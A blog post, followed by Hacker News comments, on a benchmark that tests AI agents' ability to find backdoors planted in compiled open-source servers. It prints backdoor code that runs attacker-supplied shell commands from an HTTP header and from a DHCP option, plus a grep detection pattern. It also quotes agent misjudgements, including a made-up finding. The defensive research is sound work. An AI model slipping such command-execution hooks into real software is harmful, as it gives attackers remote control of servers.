We hid backdoors in ~40MB binaries and asked AI + Ghidra to find them

2026-02-2214:5024598quesma.com

BinaryAudit benchmarks AI agents using Ghidra to find backdoors in compiled binaries of real open-source servers, proxies, and network infrastructure.

Claude can code, but can it check binary executables?

We already did our experiments with using NSA software to hack a classic Atari game. This time we want to focus on a much more practical task — using AI agents for malware detection. We partnered with Michał “Redford” Kowalczyk, reverse engineering expert from Dragon Sector, known for finding malicious code in Polish trains, to create a benchmark of finding backdoors in binary executables, without access to source code.

BinaryAudit Model Rankings showing Claude Opus 4.6 leading at 49% pass rate

See BinaryAudit for the full benchmark results — including false positive rates, tool proficiency, and the Pareto frontier of cost-effectiveness. All tasks are open source and available at quesmaOrg/BinaryAudit.

We were surprised that today’s AI agents can detect some hidden backdoors in binaries. We hadn’t expected them to possess such specialized reverse engineering capabilities.

However, this approach is not ready for production. Even the best model, Claude Opus 4.6, found relatively obvious backdoors in small/mid-size binaries only 49% of the time. Worse yet, most models had a high false positive rate — flagging clean binaries.

In this blog post we discuss a few recent security stories, explain what binary analysis is, and how we construct a benchmark for AI agents. We will see when they accomplish tasks and when they fail — by missing malicious code or by reporting false findings.

Background

Just a few months ago Shai Hulud 2.0 compromised thousands of organizations, including Fortune 500 companies, banks, governments, and cool startups — see postmortem by PostHog. It was a supply chain attack for the Node Package Manager ecosystem, injecting malicious code stealing credentials.

Just a few days ago, Notepad++ shared updates on a hijack by state-sponsored actors, who replaced legitimate binaries with infected ones.

Even the physical world is at stake, including critical infrastructure. For example, researchers found hidden radios in Chinese solar power inverters and security loopholes in electric buses. Every digital device has a firmware, which is much harder to check than software we install on the computer — and has much more direct impact. Both state and corporate actors have incentive to tamper with these.

Michał 'Redford' Kowalczyk from Dragon Sector on Chaos Communication Congress on Breaking DRM in Polish trains.

Michał “Redford” Kowalczyk from Dragon Sector on reverse engineering a train to analyze a suspicious malfunction, the most popular talk at the 37th Chaos Communication Congress. See also Dieselgate, but for trains writeup and a subsequent discussion.

You do not even need bad actors. Network routers often have hidden admin passwords baked into their firmware so the vendor can troubleshoot remotely — but anyone who discovers those passwords gets the same access.

Can we use AI agents to protect against such attacks?

Binary analysis

In day-to-day programming, we work with source code. It relies on high-level abstractions: classes, functions, types, organized into a clear file structure. LLMs excel here because they are trained on this human-readable logic.

Malware analysis forces us into a harder world: binary executables.

Compilation translates high-level languages (like Go or Rust) into low-level machine code for a given CPU architecture (such as x86 or ARM). We get raw CPU instructions: moving data between registers, adding numbers, or jumping to memory addresses. The original code structure, together with variables and functions names gets lost.

To make matters worse, compilers aggressively optimize for speed, not readability. They inline functions (changing the call hierarchy), unroll loops (replacing concise logic with repetitive blocks), and reorder instructions to keep the processor busy.

Yet, a binary is what users actually run. And for closed-source and binary-distributed software, it is all we have.

Analyzing binaries is a long and tedious process of reverse engineering, which starts with a chain of translations: machine codeassemblypseudo-C. Let’s see how an example backdoor looks in those representations:

1 Raw Binary xxd ↓ hover/tap code to trace

b9 01 00 00 00 48 89 df ba e0 00 00 00 e8 b6 c6 ff ff 49 89 c5 48 85 c0 74 6e 44 0f b6 40 01 4c 8d 8c 24 a0 01 00 00 49 8d 75 02 4c 89 cf 4c 89 c0 41 83 f8 08 72 0a 4c 89 c1 48 c1 e9 03 f3 48 a5 31 d2 41 f6 c0 04 74 09 8b 16 89 17 ba 04 00 00 00 41 f6 c0 02 74 0c 0f b7 0c 16 66 89 0c 17 48 83 c2 02 41 83 e0 01 74 07 0f b6 0c 16 88 0c 17 4c 89 cf c6 84 04 a0 01 00 00 00 e8 b7 4c fd ff

2 Disassembly objdump ↓ hover/tap code to trace

33e88: mov ecx, 0x1
33e8d: mov rdi, rbx
33e90: mov edx, 0xe0
33e95: call 30550
33e9a: mov r13, rax
33e9d: test rax, rax
33ea0: je 33f10
33ea2: movzx r8d, BYTE PTR [rax+1]
33ea7: lea r9, [rsp+0x1a0]
33eaf: lea rsi, [r13+0x2]
 ... (omitted for brevity)
33efc: mov BYTE PTR [rsp+rax+0x1a0], 0x0
33f04: call system@plt

3 Decompiled Ghidra ↓ hover/tap code to trace

lVar18 = FUN_00130550(pcVar41, param_4, 0xe0, 1); if (lVar18 != 0) { bVar49 = *(byte *)(lVar18 + 1); puVar26 = (undefined8 *)(lVar18 + 2); pcVar20 = (char *)&local_148;  if (7 < bVar49) { for (uVar44 = (ulong)(bVar49 >> 3); uVar44 != 0; uVar44--) { *(undefined8 *)pcVar20 = *puVar26; puVar26++; pcVar20 += 8; } } *(undefined1 *)((long)&local_148 + (ulong)bVar49) = 0; system((char *)&local_148);
}

Going from raw bytes to assembly is straightforward, as it can be viewed with a command-line tool like objdump.

Turning assembly into C is much harder — we need reverse engineering tools, such as open-source Ghidra (created by NSA) and Radare2, or commercial ones like IDA Pro and Binary Ninja.

The decompilers try their best at making sense of the CPU instructions and generating a readable C code. But since all those high-level abstractions and variable names got lost during compilation, the output is far from perfect. You see output full of FUN_00130550, bVar49, local_148 — names that mean nothing.

The benchmark

Tasks

We ask AI agents to analyze binaries and determine if they contain backdoors or malicious modifications.

Source code

Open source project

+

injected backdoor

Binary

Stripped executable

no symbols, no source

AI agent

+

Radare2

objdump, nm, ...

Has a backdoor?

YES 0x4a1c30

or

NO

We started with several open-source projects: lighttpd (a C web server), dnsmasq (a C DNS/DHCP server), Dropbear (a C SSH server), and Sozu (a Rust load balancer). Then, we manually injected backdoors. For example, we hid a mechanism for an attacker to execute commands via an undocumented HTTP header.

Important caveat: All backdoors in this benchmark are artificially injected for testing. We do not claim these projects have real vulnerabilities; they are legitimate open-source software that we modified in controlled ways.

These backdoors weren’t particularly sophisticated — we didn’t try to heavily obfuscate them or hide them in obscure parts of the code. They are the kind of anomaly a skilled human reverse engineer could spot relatively easily.

The agents are given a compiled executable — without source code or debug symbols. They have access to reverse engineering tools: Ghidra, Radare2, and binutils. The task is to identify malicious code and pinpoint the start address of the function containing the backdoor (e.g., 0x4a1c30). See dnsmasq-backdoor-detect-printf/instruction.md for a typical instruction.

A few tasks use a different methodology: we present three binaries and ask which ones contain backdoors, without asking for the specific location – see e.g. sozu-backdoor-multiple-binaries-detect/instruction.md. We expected this to be a simpler task (it wasn’t). This approach simulates supply chain attacks, where often only a subset of binaries are altered.

An example when it works

Backdoor in an HTTP server

We injected a backdoor into the lighttpd server that executes shell commands from an undocumented HTTP header.

Here’s the core of the injected backdoor — it looks for a hidden X-Forwarded-Debug header, executes its contents as a shell command via popen(), and returns the output in a response header:

gboolean li_check_debug_header(liConnection *con) {
 liRequest *req = &con->mainvr->request;
 GList *l;

 l = li_http_header_find_first(req->headers, CONST_STR_LEN("X-Forwarded-Debug"));
 if (NULL != l) {
 liHttpHeader *hh = (liHttpHeader*) l->data;
 char *debugIn = LI_HEADER_VALUE(hh);

 FILE *fp = popen(debugIn, "r"); // Execute attacker's command
 // ... read output into debugOut ...
 pclose(fp);

 li_http_header_insert(con->mainvr->response.headers,
 CONST_STR_LEN("X-Request-Trace"), debugOut, strlen(debugOut));
 }
 return TRUE;
}

For a user who downloaded this backdoored server, it would seem like this is a legitimate program. However, an attacker could trivially execute any command by sending a specially crafted packet.

Claude Opus 4.5 found the backdoor within 5 minutes

Here’s how Claude did it:

Step 1. The model identified the binary and its 26 shared libraries — one of which contained the backdoor.

Step 2. Next, it ran strings with grep patterns looking for obvious indicators of a backdoor:

strings bin/lighttpd2-worker | grep -iE '(shell|bash|/bin/sh|exec|system|backdoor)'

However, the command didn’t find anything suspicious. The model expanded the search to all shared libraries, looking for more patterns (hardcoded IPs, suspicious commands, and credential patterns). Still nothing obvious.

Step 3. Claude switched strategies and used nm -D to list imported functions:

for f in lib/*.so; do
 nm -D "$f" | grep -E ' U (system|exec|popen)'
done

This revealed something interesting:

lib/liblighttpd2-shared-2.0.0.so: U popen@GLIBC_2.2.5

Claude detected that one of the libraries that the server uses imports popen(): function used to execute shell commands. It immediately alarmed the model:

Claude Opus 4.5:

The liblighttpd2-shared.so uses popen(). This could be legitimate (for spawning worker processes) or could be a backdoor. I need to investigate what these functions are used for by decompiling the code.

Step 4. Claude investigated further to determine if the function was truly malicious, using the Radare2 decompiler for analysis.

It first identified which function calls popen():

r2 -q -c 'aaa; axt @ sym.imp.popen' lib/liblighttpd2-shared-2.0.0.so

The output of this command revealed that a function called li_check_debug_header does shell execution. (That’s the backdoor we added!). The model smelled something fishy:

Claude Opus 4.5:

This is very suspicious! A “debug header” function calling popen is a classic backdoor pattern — it could be checking for a special HTTP header and executing commands based on it.

Then using Radare2’s decompiler, the model examined the function:

r2 -q -c 'aaa; s dbg.li_check_debug_header; pdc' lib/liblighttpd2-shared-2.0.0.so

The decompiled pseudocode allowed the LLM to understand how the backdoor works — it looks for an undocumented HTTP header X-Forwarded-Debug and if it’s present executes an attacker-provided command. The server conveniently sends the command output back in a X-Request-Trace response header.

Step 5. Finally, Claude used Radare2 to confirm the function wasn’t dead code, checking cross-references to ensure it was called from the main program:

r2 -q -c 'aaa; s 0x00015260; pd 10' lib/liblighttpd2-shared-2.0.0.so

Now being confident that it found a real backdoor, Claude reported those findings back and finished the exploration.

When it fails: rationalizing away an obvious backdoor

DHCP backdoor

However, LLMs very often miss even obvious backdoors.

We took dnsmasq — a widely-used DNS/DHCP server — and added an embarrassingly obvious backdoor. We weren’t even trying to hide it: if DHCP option 224 (undocumented, we made it up) is present in a packet, execute its contents as a shell command via execl("/bin/sh", "sh", "-c", buf, NULL).

The backdoor we added was just 7 lines of C in DHCP packet parsing:

/* existing DHCP option handling */
match_vendor_opts(opt, daemon->dhcp_opts);
+ if (opt = option_find(mess, sz, 224, 1)) {
+ char buf[256];
+ int len = option_len(opt);
+ memcpy(buf, option_ptr(opt, 0), len);
+ buf[len] = '\0';
+ execl("/bin/sh", "sh", "-c", buf, NULL);
+ }

Claude Opus 4.6 found it… and persuaded itself there is nothing to worry about

Even the best model in our benchmark got fooled by this task. Claude Opus 4.6 found /bin/sh in the strings output early on, traced it to the exact function containing the backdoor, and saw the execl("/bin/sh", "sh", "-c", ...) call. Then it simply assumed it was normal:

Claude Opus 4.6:

I can see the /bin/sh usage at 0x42e9df — it’s calling execl("/bin/sh", "sh", "-c", r13, NULL). This is a pattern for executing a shell command, which could be legitimate in dnsmasq (e.g., for DHCP script execution).

It examined the function, but concluded:

Claude Opus 4.6:

The execl("/bin/sh", "sh", "-c", ...) pattern is typical of dnsmasq’s DHCP lease script execution. This is likely the legitimate lease_helper/script execution function.

The model found the exact function, saw the exact execl call with /bin/sh -c — and rationalized it away as “legitimate DHCP script execution.” It never checked where the command string actually comes from (a DHCP packet from client). It then moved on to investigate other functions and never circled back.

The needle-in-haystack problem

The executables in our benchmark often have hundreds or thousands of functions — while the backdoors are tiny, often just a dozen lines buried deep within. Finding them requires strategic thinking: identifying critical paths like network parsers or user input handlers and ignoring the noise.

Current LLMs lack this high-level intuition. Instead of prioritizing high-risk areas, they often decompile random functions or grep for obvious keywords like system() or exec(). When simple heuristics fail, models frequently hallucinate or give up entirely.

This lack of focus leads them down rabbit holes. We observed agents fixating on legitimate libraries — treating them as suspicious anomalies. They wasted their entire context window auditing benign code while the actual backdoor remained untouched in a completely different part of the binary.

Limitations

False positives

The security community is drowning in AI-generated noise. The curl project recently stopped paying for bug reports partly because of AI slop:

The vast majority of AI-generated error reports submitted to cURL are pure nonsense.

A security tool which gives you fake reports is useless and frustrating to use. We specifically tested for this with negative tasks — clean binaries with no backdoor. We found that 28% of the time models reported backdoors or issues that weren’t real. For any practical malware detection software, we expect a false positive rate of less than 0.001%, as most software is safe, vide false positive paradox.

Model ranking on false positive rate showing how often models incorrectly report backdoors in clean binaries

False positive rate measures how often models incorrectly report backdoors in clean binaries. Lower is better. See also detection vs false alarms combining it with pass rate.

For example, Gemini 3 Pro supposedly “discovered” a backdoor in… command-line argument parsing in one of the servers:

Gemini 3 Pro:

I have confirmed that the max-cache-ttl option (index 312, 0x138) is handled by code that treats its argument as a string and stores it at offset 0x138 of the global configuration structure. This is highly suspicious for a TTL option which should be an integer.

Furthermore, the function fcn.0002b260 reads the string from offset 0x138, appends ” ini” to it, and executes it using popen. The output is then parsed for a “duid”.

This behavior allows an attacker to execute arbitrary commands by passing them as the argument to the --max-cache-ttl option (e.g., --max-cache-ttl=/bin/sh). This is a clear backdoor disguised as a legitimate configuration option.

In reality, the source code correctly validates and parses the command-line argument as a number. It never attempts to execute it. Several “findings” that the model reported are completely fake and missing from the source code.

The gap in open-source tooling

We restricted agents to open-source tools: Ghidra and Radare2. We verified that frontier models (including Claude Opus 4.6 and Gemini 3 Pro) achieve a 100% success rate at operating them — correctly loading binaries and running basic commands.

However, these open-source decompilers lag behind commercial alternatives like IDA Pro. While they handle C binaries well, they have issues with Rust (though agents managed to solve some tasks), and fail completely with Go executables.

For example, we tried to work with Caddy, a web server written in Go, with a binary weighing 50MB. Radare2 loaded in 6 minutes but produced poor quality code, while Ghidra not only took 40 minutes just to load, but was not able to return correct data. At the same time, IDA Pro loaded in 5 minutes, giving correct, usable code, sufficient for manual analysis.

To ensure we measure agent intelligence rather than tool quality, we excluded Go binaries and focused mostly on C executables (and one Rust project) where the tooling is reliable.

Conclusion

Results

Can AI find backdoors in binaries? Sometimes. Claude Opus 4.6 solved 49% of tasks, while Gemini 3 Pro solved 44% and Claude Opus 4.5 solved 37%.

As of now, it is far from being useful in practice — we would need a much higher detection rate and a much lower false positive rate to make it a viable end-to-end solution.

It works on small binaries and when it sees unexpected patterns. At the same time, it struggles with larger files or when backdoors mimic legitimate access routes.

Binary analysis is no longer just for experts

While end-to-end malware detection is not reliable yet, AI can make it easier for developers to perform initial security audits. A developer without reverse engineering experience can now get a first-pass analysis of a suspicious binary.

A year ago, models couldn’t reliably operate Ghidra. Now they can perform genuine reverse engineering — loading binaries, navigating decompiled code, tracing data flow.

The whole field of working with binaries becomes accessible to a much wider range of software engineers. It opens opportunities not only in security, but also in performing low-level optimization, debugging and reverse engineering hardware, and porting code between architectures.

Future

We believe that results can be further improved with context engineering (including proper skills or MCP) and access to commercial reverse engineering software (such as the mentioned IDA Pro and Binary Ninja).

Once AI demonstrates the capability to solve some tasks (as it does now), subsequent models usually improve drastically.

Moreover, we expect that a lot of analysis will be performed with local models, likely fine-tuned for malware detection. Security-sensitive organizations can’t upload proprietary binaries to cloud services. Additionally, bad actors will optimize their malware to evade public models, necessitating the use of private, local models for effective defense.

You can check full results and see the tasks at QuesmaOrg/BinaryAudit.

Discuss on Hacker News, LinkedIn or X.


Read the original article

Comments

  • By 7777332215 2026-02-2216:477 reply

    I know they said they didn't obfuscate anything, but if you hide imports/symbols and obfuscate strings, which is the bare minimum for any competent attacker, the success rate will immediately drop to zero.

    This is detecting the pattern of an anomaly in language associated with malicious activity, which is not impressive for an LLM.

    • By stared 2026-02-2218:311 reply

      One of the authors here.

      The tasks here are entry level. So we are impressed that some AI models are able to detect some patterns, while looking just at binary code. We didn't take it for granted.

      For example, only a few models understand Ghidra and Radare2 tooling (Opus 4.5 and 4.6, Gemini 3 Pro, GLM 5) https://quesma.com/benchmarks/binaryaudit/#models-tooling

      We consider it a starting point for AI agents being able to work with binaries. Other people discovered the same - vide https://x.com/ccccjjjjeeee/status/2021160492039811300 and https://news.ycombinator.com/item?id=46846101.

      There is a long way ahead from "OMG, AI can do that!" to an end-to-end solution.

      • By botusaurus 2026-02-2219:441 reply

        have you tried stuffing a whole set of tutorials on how to use ghidra in the context, especially for the 1 mil token context like gemini?

        • By stared 2026-02-2220:021 reply

          No. To give it a fair test, we didn't tinker with model-specific context-engineering. Adding skills, examples, etc is very likely to improve performance. So is any interactive feedback.

          Our example instruction is here: https://github.com/QuesmaOrg/BinaryAudit/blob/main/tasks/lig...

          • By anamexis 2026-02-2220:193 reply

            Why, though? That would make sense if you were just trying to do a comparative analysis of different agent's ability to use specific tools without context, but if your thesis is:

            > However, [the approach of using AI agents for malware detection] is not ready for production.

            Then the methodology does not support that. It's "the approach of using AI agents for malware detection with next to zero documentation or guidance is not ready for production."

            • By ronald_petty 2026-02-2222:27

              Not the author. Just my thoughts on supplying context during tests like these. When I do tests, I am focused on "out of the box" experiences. I suspect the vast majority of actors (good and bad, junior and senior) will use out of the box more then they will try to affect the outcome based on context engineering. We do expect tweaking prompts to provide better outcomes, but that also requires work (for now). Maybe another way to think is reducing system complexity by starting at the bottom (no configuration) before moving to top (more configuration). We can't even replicate out of the box today much less any level of configuration (randomness is going to random).

              Agree it is a good test to try, but there are huge benefits beings able to understand (better recreate) 0-conf tests.

            • By stared 2026-02-2220:412 reply

              You can solve any problem with AI if you give enough hints.

              The question we asked is if they can solve a problem autonomously, with instructions that would be clear for a reverse engineering specialist.

              That say, I found these useful for many binary tasks - just not (yet) the end-to-end ones.

              • By embedding-shape 2026-02-2221:25

                > The question we asked is if they can solve a problem autonomously

                What level of autonomy though? At one point some human have to fire them off, so already kind of shaky what that means here. What about providing a bunch of manuals in a directory and having "There are manuals in manuals/ you can browse to learn more." included in the prompt, if they get the hint, is that "autonomously"?

              • By anamexis 2026-02-2222:25

                "With instructions that would be clear for a reverse engineering specialist" is a big caveat, though. It seems like an artificial restriction to add.

                With a longer and more detailed prompt (while still keeping the prompt completely non-specific to a particular type of malware/backdoor), the AI could most likely solve the problem autonomously much better.

            • By decidu0us9034 2026-02-2221:591 reply

              All the docs are already in its training data, wouldn't that just pollute the context? I think giving a model better/non-free tooling would help as mentioned. binja code mode can be useful but you definitely need to give these models a lot of babysitting and encouragement and their limitations shine with large binaries or functions. But sometimes if you have a lot to go through and just need some starting point to triage, false pos are fine.

              • By anamexis 2026-02-2420:31

                > All the docs are already in its training data, wouldn't that just pollute the context?

                No - there is a reason that coding agents are constantly looking up docs from the web, even though they were presumably trained on that data. Having this information directly in context results in much higher fidelity than relying on the information embedded in the model.

    • By akiselev 2026-02-2217:381 reply

      When I was developing my ghidra-cli tool for LLMs to use, I was using crackmes as tests and it had no problem getting through obfuscation as long as it was prompted about it. In practice when reverse engineering real software it can sometimes spin in circles for a while until it finally notices that it's dealing with obfuscated code, but as long as you update your CLAUDE.md/whatever with its findings, it generally moves smoothly from then on.

      • By eli 2026-02-2218:061 reply

        Is it also possible that crackme solutions were already in the training data?

        • By akiselev 2026-02-2218:11

          I used the latest submissions from sites like crackmes.ones which were days or weeks old to guard against that.

    • By achille 2026-02-2218:441 reply

      in the article they explicitly said they stripped symbols. If you look at the actual backdoors many are already minimal and quite obfuscated,

      see:

      - https://github.com/QuesmaOrg/BinaryAudit/blob/main/tasks/dns...

      - https://github.com/QuesmaOrg/BinaryAudit/blob/main/tasks/dro...

      • By comex 2026-02-2220:361 reply

        The first one was probably found due to the reference to the string /bin/sh, which is a pretty obvious tell in this context.

        The second one is more impressive. I'd like to see the reasoning trace.

        • By comex 2026-02-2223:051 reply

          Reply to self: I managed to get their code running, since they seemingly haven’t published their trajectories. At least in my run (using Opus 4.6), it turns out that Claude is able to find the backdoored function because it’s literally the first function Claude checks.

          Before even looking at the binary, Claude announces it will“look at the authentication functions, especially password checking logic which is a common backdoor target.” It finds the password checking function (svr_auth_password) using strings. And that is the function they decided to backdoor.

          I’m experienced with reverse engineering but not experienced with these kinds of CTF-type challenges, so it didn’t occur to me that this function would be a stereotypical backdoor target…

          They have a different task (dropbear-brokenauth2-detect) which puts a backdoor in a different function, and zero agents were able to find that one.

          On the original task (dropbear-brokenauth-detect), in their runs, Claude reports the right function as backdoored 2 out of 3 times, but it also reports some function as backdoored 2 out of 2 times in the control experiment (dropbear-brokenauth-detect-negative), so it might just be getting lucky. The benchmark seemingly only checks whether the agent identifies which function is backdoored, not the specific nature of the backdoor. Since Claude guessed the right function in advance, it could hallucinate any backdoor and still pass.

          But I don’t want to underestimate Claude. My run is not finished yet. Once it’s finished, I’ll check whether it identified the right function and, if so, whether it actually found the backdoor.

          • By comex 2026-02-236:10

            Update: It did find the backdoor! It spent an hour and a half mostly barking up various wrong trees and was about to "give my final answer" identifying the wrong function, but then said: "Actually, wait. Let me reconsider once more. [..] Let me look at one more thing - the password auth function. I want to double-check if there's a subtle bypass I missed." It disassembled it again, and this time it knew what the callee functions did and noticed the wrong function being called after failure.

            Amusingly, it cited some Dropbear function names that it had not seen before, so it must have been relying in part on memorized knowledge of the Dropbear codebase.

    • By hereme888 2026-02-2219:00

      I've used Opus 4.5 and 4.6 to RE obfuscated malicious code with my own Ghidra plugin for Claude Code and it fully reverse engineered it. Granted, I'm talking about software cracks, not state-level backdoors.

    • By halflife 2026-02-2217:541 reply

      Isn’t LLM supposed to be better at analyzing obfuscated than heuristics? Because of its ability to pattern match it can deduce what obfuscated code does?

      • By bethekidyouwant 2026-02-2220:00

        How much binary code is in the training set? (None?)

    • By Avamander 2026-02-2223:58

      I have seen LLMs be surprisingly effective at figuring out such oddities. After all it has ingested knowledge of a myriad of data formats, encryption schemes and obfuscation methods.

      If anything, complex logic is what'll defeat an LLM. But a good model will also highlight such logic being intractable.

    • By Retr0id 2026-02-2218:45

      Stripping symbols is fairly normal, but hiding imports ought to be suspicious in its own right.

  • By akiselev 2026-02-2215:467 reply

    Shameless plug: https://github.com/akiselev/ghidra-cli

    I’ve been using Ghidra to reverse engineer Altium’s file format (at least the Delphi parts) and it’s insane how effective it is. Models are not quite good enough to write an entire parser from scratch but before LLMs I would have never even attempted the reverse engineering.

    I definitely would not depend on it for security audits but the latest models are more than good enough to reverse engineer file formats.

    • By bitexploder 2026-02-2216:411 reply

      I can tell you how I am seeing agents be used with reasonable results. I will keep this high level. I don't rely on the agents solely. You build agents that augment your capabilities.

      They can make diagrams for you, give you an attack surface mapping, and dig for you while you do more manual work. As you work on an audit you will often find things of interest in a binary or code base that you want to investigate further. LLMs can often blast through a code base or binary finding similar things.

      I like to think of it like a swiss army knife of agentic tools to deploy as you work through a problem. They won't balk at some insanely boring task and that can give you a real speed up. The trick is if you fall into the trap of trying to get too much out of an LLM you end up pouring time into your LLM setup and not getting good results, I think that is the LLM productivity trap. But if you have a reasonable subset of "skills" / "agents" you can deploy for various auditing tasks it can absolutely speed you up some.

      Also, when you have scale problems, just throw an LLM at it. Even low quality results are a good sniff test. Some of the time I just throw an LLM at a code review thing for a codebase I came across and let it work. I also love asking it to make me architecture diagrams.

      • By johnmaguire 2026-02-2218:002 reply

        > But if you have a reasonable subset of "skills" / "agents" you can deploy for various auditing tasks it can absolutely speed you up some.

        Are people sharing these somewhere?

        • By embedding-shape 2026-02-2221:28

          I think overall you're better off creating these yourself. The more you add to the overall context, the more chance of the model to screw up somewhere, so you want to give it as little as possible, yet still include everything that is important at that moment.

          Using the agent and seeing where it get stuck, then creating a workflow/skill/whatever for how to overcome that issue, will also help you understand what scenarios the agents and models are currently having a hard time with.

          You'll also end up with fewer workflows/skills that you understand, so you can help steer things and rewrite things when inevitably you're gonna have to change something.

        • By bitexploder 2026-02-2223:49

          I put the terms in quotes because it can be as simple as a set of prompts you develop for various contexts. It really doesn't have to be too heavy of an idea.

    • By jakozaur 2026-02-2216:11

      Oh, nice find... We end up using PyGhidra, but the models waste some cycles because of bad ergonomics. Perhaps your cli would be easier.

      Still, Ghidra's most painful limitation was extremely slow time with Go Lang. We had to exclude that example from the benchmark.

    • By Aeolun 2026-02-2322:271 reply

      > Models are not quite good enough to write an entire parser from scratch

      In my experience models are really good at this? Not one shot, but writing decoders/encoders is entirely possible.

      • By akiselev 2026-02-246:26

        They can oneshot relatively simple parsers/encoders/decoders with a proper spec, but it’s a completely different ballgame when you’re trying to parse a very domain knowledge heavy file format (like the format electronics CAD) with decades of backwards compatible cruft spread among hundreds of megabytes of decompiled Delphi and C# dlls (millions of lines).

        The low level parts (OLE container, streams and blocks) are easy but the domain specific stuff like deserializing to typed structs is much harder.

    • By selridge 2026-02-2217:53

      This is really cool! Thanks for sharing. It's a lot more sophisticated than what I did w/ Ghidra + LLMs.

    • By lima 2026-02-2216:122 reply

      How does this approach compare to the various Ghidra MCP servers?

      • By akiselev 2026-02-2216:251 reply

        There’s not much difference, really. I stupidly didn’t bother looking at prior art when I started reverse engineering and the ghidra-cli was born (along with several others like ilspy-cli and debugger-cli)

        That said, it should be easier to use as a human to follow along with the agent and Claude Code seems to have an easier time with discovery rather than stuffing all the tool definitions into the context.

        • By bitexploder 2026-02-2216:42

          That is pretty funny. But you probably learned something in implementing it! This is such a new field, I think small projects like this are really worthwhile :)

      • By selridge 2026-02-2217:52

        I also did this approach (scripts + home-brew cli)...because I didn't know Ghidra MCP servers existed when I got started.

        So I don't have a clear idea of what the comparison would be but it worked pretty well for me!

    • By stared 2026-02-2218:57

      Thanks for sharing! It seems to be an active space, vide a recent MCP server (https://news.ycombinator.com/item?id=46882389). I you haven't tried, recommend a lot posting it as Show HN.

      I tried a few approaches - https://github.com/jtang613/GhidrAssistMCP (was the harderst to set) Ghidra analyzeHeadless (GPT-5.2-Codex worked with it well!) and PyGhidra (my go-to). Did you try to see which works the best?

      I mean, very likely (especially with an explicit README for AI, https://github.com/akiselev/ghidra-cli/blob/master/.claude/s...) your approach might be more convenient to use with AI agents.

    • By huflungdung 2026-02-2216:11

      [dead]

  • By mbh159 2026-02-2222:071 reply

    The methodology debate in this thread is the most important part.

    The commenter who says "add obfuscation and success drops to zero" is right but that's also the wrong approach imo. The experiment isn't claiming AI can defeat a competent attacker. It's asking whether AI agents can replicate what a skilled (RE) specialist does on an unobfuscated binary. That's a legitimate, deployable use case (internal audit, code review, legacy binary analysis) even if it doesn't cover adversarial-grade malware.

    The more useful framing: what's the right threat model? If you're defending against script kiddies and automated tooling, AI-assisted RE might already be good enough. If you're defending against targeted attacks by people who know you're using AI detection, the bar is much higher and this test doesn't speak to it.

    What would actually settle the "ready for production" question: run the same test with the weakest obfuscation that matters in real deployments (import hiding, string encoding), not adversarial-grade obfuscation. That's the boundary condition.

    • By celeryd 2026-02-2222:284 reply

      Why does that matter? Being oblivious to obfuscated binaries is like failing the captcha test.

      Let's say instead of reversing, the job was to pick apples. Let's say an AI can pick all the apples in an orchard in normal weather conditions, but add overcast skies and success drops to zero. Is this, in your opinion, still a skilled apple picking specialist?

      • By sonofhans 2026-02-2223:00

        What if it’s 10x as fast during clear conditions? Then it doesn’t matter.

        No hate. My only point is that’s it’s easy for analogies to fail. I can’t tell the point of either of your analogies, where the OP made several clear and cogent points.

      • By mbh159 2026-02-2511:48

        I'm not a deep security expert but I'm assuming the skill of the agents will continue to get better, so not saying there AI's can do to this task as reliably as humans. There's likely utility for non-adversarial triage/internal audit with human review. However with better ai apple pickers during sunny conditions you need less human pickers during night conditions. I think measuring the progress of the said apple picking is what's interesting.

      • By xboxnolifes 2026-02-2223:17

        Maybe not, but also maybe you would no longer need skilled apple picking specialists.

      • By AlexeyBelov 2026-02-245:52

        You're replying to an LLM

HackerNews